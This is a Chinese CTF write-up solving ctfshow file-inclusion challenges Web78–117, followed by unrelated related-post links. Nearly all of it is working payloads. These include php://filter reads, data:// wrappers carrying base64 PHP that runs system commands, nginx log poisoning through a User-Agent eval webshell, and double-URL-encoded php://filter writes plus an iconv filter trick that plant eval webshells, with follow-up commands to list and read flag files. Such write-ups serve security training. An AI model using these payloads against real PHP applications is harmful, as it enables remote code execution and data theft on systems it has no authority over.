文件包涵漏洞(ctfshow 无条件竞争)

Web78

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Web79

<?php system('cat flag.php');

Data协议写入内容读取

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

Web80

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?php eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web81

绕过php

?file=/var/log/nginx/access.log

文件包含nignx日志文件

User-Agent: <?=eval($_POST[1]);?>

1=system(ls);

1=system('tac fl0g.php');

Web87

Payload:

?file=php://filter/write=convert.base64-decode/resource=1.php 并且进行两次url编码

Payload:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30

再对posy上传的content二次base64加密

content=<?php @eval($_POST[1]);?>

content=UEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09

访问1.php

1=system(ls);

1=system('tac fl0g.php');

Web88

Data为协议:

<?php system('cat fl0g.php'); ?>

Base64加密后:

PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4

Web116

环境损坏

Web117

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=2.php

contents=?<hp pe@av(l_$OPTSa[aa]a;)>?

aaaa=system("tac f*");

相关推荐
独行soc14 分钟前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee1 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash2 小时前
安全算法基础(一)
算法·安全
云云3212 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3212 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
xcLeigh2 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n2 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
光路科技4 小时前
八大网络安全策略:如何防范物联网(IoT)设备带来的安全风险
物联网·安全·web安全
saynaihe4 小时前
安全地使用 Docker 和 Systemctl 部署 Kafka 的综合指南
运维·安全·docker·容器·kafka
星河梦瑾4 小时前
SpringBoot相关漏洞学习资料
java·经验分享·spring boot·安全